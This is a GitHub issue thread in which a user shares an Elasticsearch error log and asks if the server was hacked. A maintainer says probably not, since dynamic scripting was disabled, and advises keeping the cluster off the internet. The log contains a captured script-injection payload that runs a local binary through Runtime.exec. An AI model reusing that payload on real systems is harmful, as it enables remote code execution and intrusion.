### ISSUE TITLE
Am I hacked?

### ISSUE THREAD

**Issue by wdfsinap** [elastic/elasticsearch-dsl-py#339]
Today I analyze my ES logs, I find all of the logs are like this
```
[2016-02-16 17:20:22,411][DEBUG][action.search.type       ] [Razorback] [pornplaying][0], node[7B-RkEI5Rq2uLL2yqg3CPA], [P], s[STARTED]: Failed to execute [org.elasticsearch.action.search.SearchRequest@442c68e7] lastShard [true]
org.elasticsearch.search.SearchParseException: [pornplaying][0]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"./tmp/TnT\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]
	at org.elasticsearch.search.SearchService.parseSource(SearchService.java:721)
	at org.elasticsearch.search.SearchService.createContext(SearchService.java:557)
	at org.elasticsearch.search.SearchService.createAndPutContext(SearchService.java:529)
	at org.elasticsearch.search.SearchService.executeQueryPhase(SearchService.java:291)
	at org.elasticsearch.search.action.SearchServiceTransportAction$5.call(SearchServiceTransportAction.java:231)
	at org.elasticsearch.search.action.SearchServiceTransportAction$5.call(SearchServiceTransportAction.java:228)
	at org.elasticsearch.search.action.SearchServiceTransportAction$23.run(SearchServiceTransportAction.java:559)
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
	at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.script.ScriptException: dynamic scripting for [groovy] disabled
	at org.elasticsearch.script.ScriptService.verifyDynamicScripting(ScriptService.java:307)
	at org.elasticsearch.script.ScriptService.compile(ScriptService.java:282)
	at org.elasticsearch.script.ScriptService.search(ScriptService.java:429)
	at org.elasticsearch.search.fetch.script.ScriptFieldsParseElement.parse(ScriptFieldsParseElement.java:81)
	at org.elasticsearch.search.SearchService.parseSource(SearchService.java:705)
	... 9 more

```
I searched the web and someone says that maybe the server is hacked.

**Comment by HonzaKral** [comment]
You are not hacked probably since you had dynamic scripting disabled. However - you should never expose elasticsearch to the internet, make sure to always secure the network layer and don't allow access to port 9200 and 9300 to anything outside of your network.

Closing this issue since it has nothing to do with the python library.
